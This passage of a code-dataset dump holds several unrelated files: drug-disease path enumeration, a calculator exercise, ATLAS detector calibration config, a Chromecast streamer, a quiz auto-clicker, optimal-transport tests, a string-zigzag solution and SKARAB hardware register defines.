range(diseaseNum):\n if Wrd[R1, Dt] == 1: # 走到Dt\n file = open(\"PrFd0.2\\\\(\" + str(Rs) + \")\\\\\" + str(Dt) + \".txt\", \"a+\")\n file.write('{} {} {} {} {}\\n'.format(1, Rs, R1, Dt, 9999))\n file.close()\n\n# 2.R-D-D\nfor Rs in range(drugNum): # 从Rs出发\n print(\"第2次路径分析第\" + str(Rs) + \"个药物\")\n for D1 in range(diseaseNum):\n if Wrd[Rs, D1] != 0: # 走到D1\n for Dt in range(diseaseNum):\n if Dt != D1 and Wdd[D1, Dt] != 0: # 走到Dt(跳过D1)\n file = open(\"PrFd0.2\\\\(\" + str(Rs) + \")\\\\\" + str(Dt) + \".txt\", \"a+\")\n file.write('{} {} {} {} {}\\n'.format(2, Rs, D1, Dt, 9999))\n 
file.close()\n\n# 3.R-R-D-D\nfor Rs in range(drugNum): # 从Rs出发\n print(\"第3次路径分析第\" + str(Rs) + \"个药物\")\n for R1 in range(drugNum):\n if R1 != Rs and Wrr[Rs, R1] != 0: # 走到R1(跳过Rs)\n for D1 in range(diseaseNum):\n if Wrd[R1, D1] != 0: # 走到D1\n for Dt in range(diseaseNum):\n if Dt != D1 and Wdd[Dt, D1] != 0: # 走到Dt\n file = open(\"PrFd0.2\\\\(\" + str(Rs) + \")\\\\\" + str(Dt) + \".txt\", \"a+\")\n file.write('{} {} {} {} {}\\n'.format(3, Rs, R1, D1, Dt))\n file.close()\n\n# 4.R-D-R-D\nfor Rs in range(drugNum): # 从Rs出发\n print(\"第4次路径分析第\" + str(Rs) + \"个药物\")\n for D1 in range(diseaseNum):\n if Wrd[Rs, D1] != 0: # 走到D1\n for R1 in range(drugNum):\n if R1 != Rs and Wrd[R1, D1] != 0: # 走到R1\n for Dt in range(diseaseNum):\n if Dt != D1 and Wrd[R1, Dt] != 0: # 走到Dt\n file = open(\"PrFd0.2\\\\(\" + str(Rs) + \")\\\\\" + str(Dt) + \".txt\", \"a+\")\n file.write('{} {} {} {} {}\\n'.format(4, Rs, D1, R1, Dt))\n file.close()\n\n# 5.R-R-R-D\nfor Rs in range(drugNum): # 从Rs出发\n print(\"第5次路径分析第\" + str(Rs) + \"个药物\")\n for R1 in range(drugNum):\n if Rs != R1 and Wrr[Rs, R1] != 0: # 走到R1\n for R2 in range(drugNum):\n if Rs != R1 != R2 and Rs != R2 and Wrr[R1, R2] != 0: # 走到R2\n for Dt in range(diseaseNum):\n if Wrd[R2, Dt] != 0: # 走到Dt\n file = open(\"PrFd0.2\\\\(\" + str(Rs) + \")\\\\\" + str(Dt) + \".txt\", \"a+\")\n file.write('{} {} {} {} {}\\n'.format(5, Rs, R1, R2, Dt))\n file.close()\n\n# 6.R-D-D-D\nfor Rs in range(drugNum): # 从Rs出发\n print(\"第6次路径分析第\" + str(Rs) + \"个药物\")\n for D1 in range(diseaseNum):\n if Wrd[Rs, D1] != 0: # 走到D1\n for D2 in range(diseaseNum):\n if D1 != D2 and Wdd[D1, D2] != 0: # 走到D2\n for Dt in range(diseaseNum):\n if D1 != D2 != Dt and D1 != Dt and Wdd[D2, Dt] != 0: # 走到Dt\n file = open(\"PrFd0.2\\\\(\" + str(Rs) + \")\\\\\" + str(Dt) + \".txt\", \"a+\")\n file.write('{} {} {} {} {}\\n'.format(6, Rs, D1, D2, Dt))\n file.close()\n","sub_path":"201808/LSTM/PathEnum.py","file_name":"PathEnum.py","file_ext":"py","file_size_in_byte":4439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"133989297","text":"# Написать программу, в которой вводятся два операнда Х и Y\n# и знак операции sign (+, –, /, *). Вычислить результат Z в\n# зависимости от знака. Предусмотреть реакции на возможный\n# неверный знак операции, а также на ввод Y=0 при делении.\n# Организовать возможность многократных вычислений без\n# перезагрузки программа (т.е. построить бесконечный цикл).\n# В качестве символа прекращения вычислений принять ‘0’ (т.е. 
sign='0').\n\n# Список знаков, которые может обработать программа\nsign_list = ['+', '-', '*', '/']\n\nwhile True:\n X = input('Введите X: ')\n Y = input('Введите Y: ')\n\n # Проверяем X и Y - являются ли числами, если не являются,\n # выводится предупреждение и заново выводится запрос на ввод чисел\n if X.isdigit() and Y.isdigit():\n X = int(X)\n Y = int(Y)\n else:\n print('Проверьте введенные данные: X и Y должны быть числами')\n continue\n\n # Вводится знак операции\n sign = input('Введите знак операции: ')\n\n # 1) Если знак в списке знаков - вычисляет\n if sign in sign_list:\n if sign == sign_list[0]:\n Z = X + Y\n\n if sign == sign_list[1]:\n Z = X - Y\n\n if sign == sign_list[2]:\n Z = X * Y\n\n # Если это знак деления и Y не равно 0, то будет вычислять, если Y = 0,\n # то вывести предупреждение и начать программу заново\n if sign == sign_list[3] and Y != 0: # неверно\n Z = X / Y\n elif Y == 0:\n print('Делить на ноль нельзя!')\n continue\n\n # 2) Если знак = 0, прекращает работу программы\n elif sign == '0':\n print('Программа завершена')\n break\n\n # 3) Если знака в списке знаков нет - просит проверить знак\n else:\n print('Проверьте правильность введенного знака')\n continue\n\n # Вывод конечного результата\n print(Z)\n continue","sub_path":"HW/HW06/task_6_1.py","file_name":"task_6_1.py","file_ext":"py","file_size_in_byte":2697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"515609676","text":"# Copyright (C) 2002-2020 CERN for the benefit of the ATLAS collaboration\n\n###############################################################\n# author Caleb Lampen lampen@physics.arizona.edu \n#\n# cscWritePedCool.py\n# Standard script to update CSC UPD1 pedestal tags\n#==============================================================\n#Input calibration text file\nif(\"input\" not in dir()):\n input = \"/raid02/lampen/datasets/csc/pedRuns/nov/pedestal.cal\"\n#Output db file name\nif(\"output\" not in dir()):\n output = \"cscPed.db\"\n#Should be \"COMP200\" or \"OFLP200\"\nif(\"dbname\" not in dir()):\n dbname = \"COMP200\"\n#Csc tag that will be used for any merging\nif(\"mergeCscTag\" not in dir()):\n mergeCscTag = \"Csc-ES1-002-00\"\n\nIOVRunStart=0\n\n#use McEventSelector\nDetDescrVersion = \"ATLAS-GEONTF-08-00-00\"\n\nimport AthenaCommon.AtlasUnixStandardJob\nfrom AthenaCommon.AppMgr import theApp\ntheApp.EvtMax =1 \n\nfrom AthenaCommon.AlgSequence import AlgSequence\ntopSequence = AlgSequence()\n\n#switch Inner Detector and/or Calorimeter if needed\n# DetFlags modifications are best set here (uncomment RecExCommon_flags first)\n#from AthenaCommon.GlobalFlags import GlobalFlags\nfrom AthenaCommon.GlobalFlags import GlobalFlags\n#GlobalFlags.DetGeo.set_atlas()\n#GlobalFlags.DataSource.set_geant4()\nGlobalFlags.DetGeo.set_commis()\nGlobalFlags.DataSource.set_data()\n#inc (\"RecExCommon/RecExCommon_flags.py\")\ninclude (\"RecExCond/RecExCommon_flags.py\")\n\nfrom AthenaCommon.DetFlags import DetFlags\nDetFlags.detdescr.Muon_setOn()\nDetFlags.detdescr.ID_setOff()\nDetFlags.detdescr.LAr_setOff()\nDetFlags.detdescr.Tile_setOff()\nDetFlags.Print()\n\n#GlobalFlags.InputFormat.set_bytestream()\n\ninclude (\"RecExCond/AllDet_detDescr.py\")\n\n# Detector Initialization\nfrom AtlasGeoModel import SetGeometryVersion\nfrom GeoModelSvc.GeoModelSvcConf import GeoModelSvc\nfrom AtlasGeoModel import GeoModelInit\n\n\n\n#CscReadWRiteCoolStr is a wrapper for the CscCoolStrSvc. 
It will have the \n#flat file coppied to the database\nfrom MuonCondCool.MuonCondCoolConf import MuonCalib__CscReadWriteCoolStr\ntopSequence += MuonCalib__CscReadWriteCoolStr()\nCscReadWriteDatabase= MuonCalib__CscReadWriteCoolStr()\nCscReadWriteDatabase.Write=True\nCscReadWriteDatabase.iFiles=[input]\n\n#Define cool foldernames. These need to be given to both\n#CoolStrSvc and IovDbSvc\ngainFolder = \"/CSC/GAIN\"\npslopeFolder = \"/CSC/PSLOPE\"\nrslopeFolder = \"/CSC/RSLOPE\"\npedFolder \t= \"/CSC/PED\"\nnoiseFolder\t= \"/CSC/NOISE\"\nrmsFolder = \"/CSC/RMS\"\nf001Folder = \"/CSC/FTHOLD\"\ntholdFolder = \"/CSC/THOLD\"\npeaktFolder = \"/CSC/PEAKT\"\nwidthFolder = \"/CSC/WIDTH\"\nsat1Folder \t= \"/CSC/SAT1\"\nsat2Folder\t= \"/CSC/SAT2\"\npeakcFolder\t= \"/CSC/PEAKC\"\nsampleTimeRatioFolder\t= \"/CSC/SAMPLERATIO\"\noccupancyFolder\t= \"/CSC/OCCUPANCY\"\nstatFolder = \"/CSC/STAT\"\n\n#suspendCaching()\n\n# data is written to conditions database using OutputConditionsAlg\nfrom RegistrationServices.OutputConditionsAlg import OutputConditionsAlg\nOutCondAlg = OutputConditionsAlg(\"OutCondAlg\",\"dummy.root\")\n\n# List of things to be written.\n# Make sure that only the folders you actually want to write are\n# in this list. If something is in this list, and isn't in \n# the calibration file, the entire job will fail.\nprefix = \"CondAttrListCollection#\"\nOutCondAlg.ObjectList=[ \n#prefix + gainFolder, \n#prefix + pslopeFolder,\n#prefix + rslopeFolder,\nprefix + pedFolder,\nprefix + noiseFolder, \nprefix + rmsFolder,\nprefix + f001Folder,\n#prefix + f001Folder,\n#prefix + tholdFolder,\n#prefix + peaktFolder,\n#prefix + widthFolder,\n#prefix + sat1Folder , \n#prefix +sat2Folder, \n#prefix + peakcFolder,\n#prefix + sampleTimeRatioFolder,\n#prefix + occupancyFolder,\n#prefix + statFolder\n]\n\n#Taglist must be in same order as folder list!\nOutCondAlg.IOVTagList = [ \n#\"CscGain-sim-100-00\",\n#\"CscPslope-sim-000-01\",\n#\"CscRslope-temp-000-00\",\n\"CscPed-ES1-UPD1-002-00\",\n\"CscNoise-ES1-UPD1-002-00\",\n\"CscRms-ES1-UPD1-002-00\",\n\"CscFthold-ES1-UPD1-002-00\",\n#\"CscFthold-comm-ES1-UPD1-002-03\",\n#\"CscThold-test-000-00\",\n#\"CscPeakt-test-000-00\",\n#\"CscWidth-sim-100-00\",\n#\"CscSat1-sim-100-00\",\n#\"CscSat2-sim-100-00\",\n#\"CscPeakc-sim-100-00\",\n#\"CscSampleratio-sim-100-00\",\n#\"CscOccupancy-sim-100-00\",\n#\"CscStat-comm-002-01\"\n]\n\nOutCondAlg.WriteIOV=True\n# set the interval of validity for the file here\n# putting nothing for Run2 (uppser limit) falls back on default \n#which is to be valid for all run/event\nOutCondAlg.Run1=IOVRunStart\n#OutputConditionsAlg.Event1=0\n#OutputConditionsAlg.Run2=9999\n#OutputConditionsAlg.Event2=9999\n\n##############\nfrom IOVDbSvc.CondDB import conddb\nconddb.setGlobalTag('COMCOND-HLTP-002-00')\n#conddb.setGlobalTag(\"COMCOND-006-00\")\ninclude(\"RegistrationServices/IOVRegistrationSvc_jobOptions.py\")\n#conddb.setGlobalTag('DEFAULTCOND')\nfrom AthenaCommon.AppMgr import ServiceMgr\nServiceMgr.IOVRegistrationSvc.OverrideNames+=[\"Data\"]\nServiceMgr.IOVRegistrationSvc.OverrideTypes+=[\"String64k\"]\n#WARNING! This will APPEND to the end of the old database file! 
Not overwrite!\nServiceMgr.IOVDbSvc.dbConnection =\"sqlite://;schema=\" + output + \";dbname=\" + dbname\n#Should never be changed to True unless absolutely sure!!!\n#ServiceMgr.IOVRegistrationSvc.RecreateFolders = False\n\n\n###############\n#Set detector description\n#DetDescrVersion = \"ATLAS-Comm-01-00-00\"\ninclude (\"RecExCond/AllDet_detDescr.py\")\n\n# CscCoolStrSvc preps data to be sent to cool database\nfrom MuonCondSvc.CscCondDB import cscCondDB\n#Stop caching since we aren't interested in reading it out right now\n#cscCondDB.useLocalFile()\n#cscCondDB.SetupForNewFolder()\ncscCondDB.CscCoolStrSvc.DoCaching = True\ncscCondDB.CscCoolStrSvc.DoMerge = True\ncscCondDB.addPedFolders()\ncscCondDB.addRmsFolder()\ncscCondDB.addF001Folder()\nconddb.addOverride(\"/CSC\",mergeCscTag)\n#cscCondDB.addStatusFolder()\n#conddb.addOverride(\"/CSC/STAT\",\"CscStat-comm-002-00\")\n#cscCondDB.addStatusFolder()\n#ServiceMgr.MessageSvc.OutputLevel = DEBUG \nServiceMgr.MessageSvc.debugLimit = 0 \n#ServiceMgr.CscCoolStrSvc.OutputLevel = VERBOSE\n","sub_path":"MuonSpectrometer/MuonConditions/MuonCondGeneral/MuonCondCool/share/cscWritePedCool.py","file_name":"cscWritePedCool.py","file_ext":"py","file_size_in_byte":5904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"644308083","text":"import os\nimport pychromecast\nimport time\nimport http.server\nimport socketserver, socket\nimport threading\nfrom utils import get_ip\n\n# Needs refactoring, hard to understand variables\ndef stream_to_chromecast(video_dir, subs):\n\n content_type = \"video/\" + os.path.splitext(video_dir)[1][1:]\n print(\"Searching for chromecasts...\")\n chromecasts = pychromecast.get_chromecasts()\n\n counter = 1\n for chromecast in chromecasts:\n print(str(counter) + \": \" + str(chromecast.device.friendly_name))\n\n cast_index = int(input(\"Select chromecast by number: \")) - 1\n\n if cast_index >= 0 and cast_index < len(chromecasts):\n chromecast = chromecasts[cast_index]\n else:\n print(\"Invalid index, aborting...\")\n return\n\n chromecast.wait()\n\n http_thread = threading.Thread(target=http_cast_server)\n http_thread.daemon = True\n http_thread.start()\n\n hostlink = get_ip()\n\n medialink = \"http://\" + hostlink + \":8080\" + video_dir\n subslink = \"http://\" + hostlink + \":8080\" + subs\n\n media_title = video_dir.split(\"/\")[-1]\n\n controller = chromecast.media_controller\n\n # Subtitles doesn't show up? 
:/\n controller.play_media(medialink,\n content_type,\n subtitles=subslink,\n subtitles_mime=\"text/srt\",\n title=media_title\n )\n\n controller.block_until_active()\n\n controller.enable_subtitle(1)\n\n # Add controller loop here\n while True:\n time.sleep(10)\n print(controller.status)\n\n\ndef http_cast_server():\n http_handler = http.server.SimpleHTTPRequestHandler\n\n with socketserver.TCPServer((\"\", 8080), http_handler) as httpd:\n httpd.serve_forever()\n\n","sub_path":"src/chromecast.py","file_name":"chromecast.py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"437164346","text":"from selenium import webdriver\nimport time\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\ndriver = webdriver.Chrome(r\"C:\\Users\\Pavel\\Documents\\python\\lolClicker\\chromedriver.exe\")\nanswers = [\"Tryndamere\", \"FunPlus Phoenix\", \"SK Telecom T1\", \"2009\", \"Ezreal\", \"Graves\", \"Jönköping\", \"Marksman\", \"The blade dancer\", \"Fighter\", \"Kai'Sa\", \"Fnatic\", \"Viper\", \"Orb of Deception\",\n \"Paris\", \"08:00\", \"Tremors\", \"The prodigal explorer\", \"Caitlyn\", \"+75 Mana\", \"71:34 min\", \"Ornn\", \"Samira and Yone\", \"USA\", \"99\", \"Ryze\", \"2011\", \"110\", \"9\", \"The deceiver\", \"'40,000\", \"20:00\",\n \"Team Liquid\", \"213\", \"22\", \"Terrashape\", \"151\", \"The blind monk\", \"85,5%\", \"Named after Riot employees\", \"Jinx\", \"59\", \"Pantheon\", \"Bladework\", \"Gen.G\", \"Kled\", \"Garen\", \"Galio\",\n \"The titan of the depths\", \"23:33 min\", \"Katarina and Cassiopeia\", \"+3 life on-hit\", \"Kennen and Tahm Kench\", \"Pudong Football Stadium\"]\n\ncounter = 0\n\ndriver.maximize_window()\ndriver.get(r\"https://join.stagecast.se/api/web/code/3563/Md61PapT0Uh1PRxtriaLnoTuUEeYFnkkxYQ9\")\n\ndriver.switch_to.frame(\"frame\")\n\ncheckbox = WebDriverWait(driver, 20).until(EC.element_to_be_clickable((By.CLASS_NAME, \"mc-checkmark\")))\ncheckbox.click()\n\nstartButton = WebDriverWait(driver, 20).until(EC.element_to_be_clickable((By.CLASS_NAME, \"main-button\")))\nstartButton.click()\n\nplayAgainButton = WebDriverWait(driver, 20).until(EC.element_to_be_clickable((By.XPATH, '//button[text()=\"Play Again\"]')))\nplayAgainButton.click()\n\ntime.sleep(5)\n\nwhile True:\n for answer in answers:\n isFound = driver.find_elements_by_xpath('//span[text()=\"' + answer +'\"]')\n if len(isFound) > 0:\n print(\"Here\")\n time.sleep(0.4)\n isFound[0].click()\n time.sleep(0.55)","sub_path":"clicker.py","file_name":"clicker.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"175033482","text":"from pysdot.domain_types import ConvexPolyhedraAssembly\nfrom pysdot.radial_funcs import RadialFuncEntropy\nfrom pysdot.radial_funcs import RadialFuncInBall\nfrom pysdot.radial_funcs import RadialFuncUnit\nfrom pysdot import OptimalTransport\nimport numpy as np\nimport unittest\n\n\nclass TestOptimalTransport(unittest.TestCase):\n def setUp(self):\n self.domain = ConvexPolyhedraAssembly()\n self.domain.add_box([0, 0], [1, 1])\n\n def test_base_ot(self, nb_diracs=1000):\n for _ in range(100):\n ot = OptimalTransport(self.domain)\n\n # diracs\n ot.set_positions(np.random.rand(nb_diracs, 2))\n ot.set_weights(np.ones(nb_diracs))\n\n # optimal weights\n ot.adjust_weights()\n\n # 
integrals\n areas = ot.pd.integrals()\n self.assertAlmostEqual(np.min(areas), 1.0 / nb_diracs, places=6)\n self.assertAlmostEqual(np.max(areas), 1.0 / nb_diracs, places=6)\n\n # ot.pd.display_vtk(\"results/vtk/pd.vtk\")\n\n def test_ball_cut(self, nb_diracs=100):\n for _ in range(10):\n ot = OptimalTransport(self.domain, radial_func=RadialFuncInBall())\n\n positions = np.random.rand(nb_diracs, 2)\n positions[:, 1] *= 0.5\n\n radius = 0.25 / nb_diracs**0.5\n mass = np.pi * radius**2\n\n # diracs\n ot.set_positions(positions)\n ot.set_weights(np.ones(nb_diracs) * radius**2)\n ot.set_masses(np.ones(nb_diracs) * mass)\n\n # optimal weights\n ot.adjust_weights()\n\n ot.pd.display_vtk(\"results/pd.vtk\")\n\n # integrals\n areas = ot.pd.integrals()\n\n self.assertAlmostEqual(np.min(areas), mass, places=6)\n self.assertAlmostEqual(np.max(areas), mass, places=6)\n\n\nif __name__ == '__main__':\n np.random.seed(1)\n unittest.main()\n","sub_path":"tests/test_optimal_transport.py","file_name":"test_optimal_transport.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"624212894","text":"'''\nProblem: A string is written in a zigzag pattern on a given number of rows\nSolution: Observe index increasing properties on each column, and off columns; on each column, for row i: i + (numRows - 1)*2; for off-column elements (except the 1st and last column): i + (numRows -1 - i)*2\n'''\t\nif __name__ == '__main__':\n\tdef convert(s, numRows):\n\t\tresult = str()\n\t\tif numRows == 1:\n\t\t\tresult = s\n\t\telse:\n\t\t\tfor row in range(numRows):\n\t\t\t\tfor i in range(row, len(s), 2*(numRows - 1)):\n\t\t\t\t\tresult += s[i]\n\t\t\t\t\tif row > 0 and row < numRows-1 and i+2*(numRows-1-row) < len(s):\n\t\t\t\t\t\tresult += s[i + 2 *(numRows - 1 - row)]\n\t\treturn result\n\n\ts = 'PAYPALISHIRING'\n\tr1 = convert(s, 3)\n\tprint(r1)\n","sub_path":"6_zigZagConvension.py","file_name":"6_zigZagConvension.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"201471126","text":"'''\nDescription:\nDefines for the Skarab Motherboard.\n - Includes\n \t- OPCCODES\n \t- PORTS\n \t- Register Masks\n \t- Data structures\n\n '''\n# SKARAB Port Addresses\nETHERNET_FABRIC_PORT_ADDRESS = 0x7148\nETHERNET_CONTROL_PORT_ADDRESS = 0x7778\nDEFAULT_SKARAB_MOTHERBOARD_IP_ADDRESS = \"10.0.7.2\" \n\n# Response packet timeout\nCONTROL_RESPONSE_TIMEOUT = 1000\n\n# BOARD REGISTER OFFSET\n# READ REGISTERS\nC_RD_VERSION_ADDR \t= \t0x0\nC_RD_BRD_CTL_STAT_0_ADDR = \t0x4\nC_RD_LOOPBACK_ADDR = \t0x8\nC_RD_ETH_IF_LINK_UP_ADDR = \t0xC\nC_RD_MEZZANINE_STAT_ADDR = \t0x10\nC_RD_USB_STAT_ADDR = \t0x14\nC_RD_SOC_VERSION_ADDR = \t0x18\nC_RD_THROUGHPUT_COUNTER\t=\t \t0x58\nC_RD_NUM_PACKETS_CHECKED_0 = 0x5C\nC_RD_NUM_PACKETS_CHECKED_1 = 0x60\nC_RD_NUM_PACKETS_CHECKED_2 = 0x64\nC_RD_MEZZANINE_CLK_FREQ_ADDR = 0x74\nC_RD_CONFIG_CLK_FREQ_ADDR = \t0x78\nC_RD_AUX_CLK_FREQ_ADDR = \t0x7C\n\n# WRITE REGISTERS\nC_WR_BRD_CTL_STAT_0_ADDR = \t\t\t\t0x4\nC_WR_LOOPBACK_ADDR = \t\t\t\t0x8\nC_WR_ETH_IF_CTL_ADDR = \t\t\t0xC\nC_WR_MEZZANINE_CTL_ADDR =\t\t\t\t\t0x10\nC_WR_FRONT_PANEL_STAT_LED_ADDR =\t\t\t0x14\nC_WR_BRD_CTL_STAT_1_ADDR =\t\t\t\t\t0x18\nC_WR_RAMP_SOURCE_DESTINATION_IP_3_ADDR = 0x58\nC_WR_RAMP_CHECKER_SOURCE_IP_3_ADDR = 0x5C\nC_WR_RAMP_SOURCE_DESTINATION_IP_2_ADDR = 0x60\nC_WR_RAMP_CHECKER_SOURCE_IP_2_ADDR = 0x64\nC_WR_RAMP_SOURCE_DESTINATION_IP_1_ADDR = 
0x68\nC_WR_RAMP_CHECKER_SOURCE_IP_1_ADDR = 0x6C\nC_WR_RAMP_SOURCE_PAYLOAD_WORDS_ADDR = \t0x70\nC_WR_RAMP_SOURCE_DESTINATION_IP_0_ADDR = 0x74\nC_WR_RAMP_CHECKER_SOURCE_IP_0_ADDR = 0x78\nC_WR_NUM_PACKETS_TO_GENERATE =\t\t\t\t0x7C\n\n# REGISTER MASKS\nMEZZANINE_PRESENT =\t\t\t0x1\nMEZZANINE_FAULT =\t\t\t0x100\nMEZZANINE_INTERRUPT =\t\t0x10000\nMEZZANINE_ENABLE =\t\t\t0x1\nMEZZANINE_RESET =\t\t\t0x100\nMEZZANINE_USE_ON_BRD_CLK =\t0x10000\n\nMONITOR_ALERT =\t\t\t\t0x2\nFAN_CONTROLLER_ALERT =\t\t0x4\nFAN_CONTROLLER_FAULT =\t\t0x8\nGBE_PHY_LINK_UP =\t\t\t0x10\nROACH3_SHUTDOWN =\t\t\t0x80000000\nROACH3_FPGA_RESET =\t\t\t0x40000000\n\nFRONT_PANEL_STATUS_LED0 =\t\t0x1\nFRONT_PANEL_STATUS_LED1 =\t\t0x2\nFRONT_PANEL_STATUS_LED2 =\t\t0x4\nFRONT_PANEL_STATUS_LED3 =\t\t0x8\nFRONT_PANEL_STATUS_LED4 =\t\t0x10\nFRONT_PANEL_STATUS_LED5 =\t\t0x20\nFRONT_PANEL_STATUS_LED6 =\t\t0x40\nFRONT_PANEL_STATUS_LED7 =\t\t0x80\n\nBOARD_REG =\t\t\t\t0x1\nDSP_REG =\t\t\t\t0x2\n\nFLASH_MODE =\t\t\t0x0\nSDRAM_PROGRAM_MODE =\t0x1\nSDRAM_READ_MODE =\t\t0x2\n\nMB_ONE_WIRE_PORT =\t\t\t0x0\nMEZ_0_ONE_WIRE_PORT =\t\t0x1\nMEZ_1_ONE_WIRE_PORT =\t\t0x2\nMEZ_2_ONE_WIRE_PORT =\t\t0x3\nMEZ_3_ONE_WIRE_PORT =\t\t0x4\n\n# Command ID's (In Request Packet)\n# (Command ID in response = request packet ID + 1)\nWRITE_REG =\t\t\t\t\t\t0x0001\nREAD_REG =\t\t\t\t\t\t0x0003\nWRITE_WISHBONE =\t\t\t\t0x0005\nREAD_WISHBONE =\t\t\t\t\t0x0007\nWRITE_I2C =\t\t\t\t\t\t0x0009\nREAD_I2C =\t\t\t\t\t\t0x000B\nSDRAM_RECONFIGURE =\t\t\t\t0x000D\nREAD_FLASH_WORDS =\t\t\t\t0x000F\nPROGRAM_FLASH_WORDS =\t\t\t0x0011\nERASE_FLASH_BLOCK =\t\t\t\t0x0013\nREAD_SPI_PAGE =\t\t\t\t\t0x0015\nPROGRAM_SPI_PAGE =\t\t\t\t0x0017\nERASE_SPI_SECTOR =\t\t\t\t0x0019\nONE_WIRE_READ_ROM_CMD =\t\t\t0x001B\nONE_WIRE_DS2433_WRITE_MEM =\t\t0x001D\nONE_WIRE_DS2433_READ_MEM =\t\t0x001F\nDEBUG_CONFIGURE_ETHERNET =\t\t0x0021\nDEBUG_ADD_ARP_CACHE_ENTRY =\t\t0x0023\nGET_EMBEDDED_SOFTWARE_VERS =\t0x0025\nPMBUS_READ_I2C =\t\t\t\t0x0027\nSDRAM_PROGRAM =\t\t\t\t\t0x0029\nCONFIGURE_MULTICAST =\t\t\t0x002B\nDEBUG_LOOPBACK_TEST =\t\t\t0x002D\nQSFP_RESET_AND_PROG =\t\t\t0x002F\n\n#I2C BUS DEFINES\nMB_I2C_BUS_ID =\t\t\t\t\t0x0\nMEZZANINE_0_I2C_BUS_ID =\t\t0x1\nMEZZANINE_1_I2C_BUS_ID =\t\t0x2\nMEZZANINE_2_I2C_BUS_ID =\t\t0x3\nMEZZANINE_3_I2C_BUS_ID =\t\t0x4\n\n# STM I2C DEFINES\nSTM_I2C_DEVICE_ADDRESS =\t\t\t\t\t0x0C # 0x18 shifted down by 1 bit\nSTM_I2C_BOOTLOADER_DEVICE_ADDRESS =\t\t\t0x08 # 0x10 shifted down by 1 bit\n\n# PCA9546 DEFINES\nPCA9546_I2C_DEVICE_ADDRESS =\t0x70\t# Address without read/write bit\nFAN_CONT_SWITCH_SELECT =\t\t0x01\nMONITOR_SWITCH_SELECT =\t\t\t0x02\nONE_GBE_SWITCH_SELECT =\t\t\t0x04\n\n# MAX31785 FAN CONTROLLER DEFINES\nSMBUS_ARA_ADDRESS =\t\t\t\t0x0C\t# Alert response address\nMAX31785_I2C_DEVICE_ADDRESS =\t0x52\t# Address without read/write bit\n\nTEMP_SENSOR_READING_FAULT =\t0x7FFF\n\n# MAX31785 FAN CONTROLLER PAGES\nLEFT_FRONT_FAN_PAGE =\t\t\t0\nLEFT_MIDDLE_FAN_PAGE =\t\t\t1\nLEFT_BACK_FAN_PAGE =\t\t\t2\nRIGHT_BACK_FAN_PAGE =\t\t\t3\nFPGA_FAN =\t\t\t\t\t\t4\n\nFPGA_TEMP_DIODE_ADC_PAGE =\t\t10\nFAN_CONT_TEMP_SENSOR_PAGE =\t\t12\nINLET_TEMP_SENSOR_PAGE =\t\t13\nOUTLET_TEMP_SENSOR_PAGE =\t\t14\n\nMEZZANINE_0_TEMP_ADC_PAGE =\t17\nMEZZANINE_1_TEMP_ADC_PAGE =\t18\nMEZZANINE_2_TEMP_ADC_PAGE =\t19\nMEZZANINE_3_TEMP_ADC_PAGE =\t20\n\nPLUS3V3AUX_ADC_PAGE =\t\t\t22\n\nALL_PAGES_PAGE =\t\t\t\t255\n\n# MAX31785 FAN CONTROLLER PMBUS COMMANDS\nPAGE_CMD =\t\t\t\t\t0x00\nCLEAR_FAULTS_CMD =\t\t\t0x03\nWRITE_PROTECT_CMD =\t\t\t0x10\nSTORE_DEFAULT_ALL_CMD 
=\t\t0x11\nRESTORE_DEFAULT_ALL_CMD\t =\t0x12\nCAPABILITY_CMD =\t\t\t0x19\nVOUT_MODE_CMD =\t\t\t\t0x20\nVOUT_SCALE_MONITOR_CMD =\t0x2A\nFAN_CONFIG_1_2_CMD =\t\t0x3A\nFAN_COMMAND_1_CMD =\t\t\t0x3B\nVOUT_OV_FAULT_LIMIT_CMD =\t0x40\nVOUT_OV_WARN_LIMIT_CMD =\t0x42\nVOUT_UV_WARN_LIMIT_CMD =\t0x43\nVOUT_UV_FAULT_LIMIT_CMD =\t0x44\nOT_FAULT_LIMIT_CMD =\t\t0x4F\nOT_WARN_LIMIT_CMD =\t\t\t0x51\nSTATUS_BYTE_CMD =\t\t\t0x78\nSTATUS_WORD_CMD =\t\t\t0x79\nSTATUS_VOUT_CMD =\t\t\t0x7A\nSTATUS_CML_CMD =\t\t\t0x7E\nSTATUS_MFR_SPECIFIC_CMD =\t0x80\nSTATUS_FANS_1_2_CMD =\t\t0x81\nREAD_VOUT_CMD =\t\t\t\t0x8B\nREAD_TEMPERATURE_1_CMD =\t0x8D\nREAD_FAN_SPEED_1_CMD =\t\t0x90\nPMBUS_REVISION_CMD =\t\t0x98\nMFR_ID_CMD =\t\t\t\t0x99\nMFR_MODEL_CMD =\t\t\t\t0x9A\nMFR_REVISION_CMD =\t\t\t0x9B\nMFR_LOCATION_CMD =\t\t\t0x9C\nMFR_DATE_CMD =\t\t\t\t0x9D\nMFR_SERIAL_CMD =\t\t\t0x9E\nMFR_MODE_CMD =\t\t\t\t0xD1\nMFR_VOUT_PEAK_CMD =\t\t\t0xD4\nMFR_TEMPERATURE_PEAK_CMD =\t0xD6\nMFR_VOUT_MIN_CMD =\t\t\t0xD7\nMFR_FAULT_RESPONSE_CMD =\t0xD9\nMFR_NV_FAULT_LOG_CMD =\t\t0xDC\nMFR_TIME_COUNT_CMD =\t\t0xDD\nMFR_TEMP_SENSOR_CONFIG_CMD =0xF0\nMFR_FAN_CONFIG_CMD =\t\t0xF1\nMFR_FAN_LUT_CMD =\t\t\t0xF2\nMFR_READ_FAN_PWM_CMD =\t\t0xF3\nMFR_FAN_FAULT_LIMIT_CMD =\t0xF5\nMFR_FAN_WARN_LIMIT_CMD 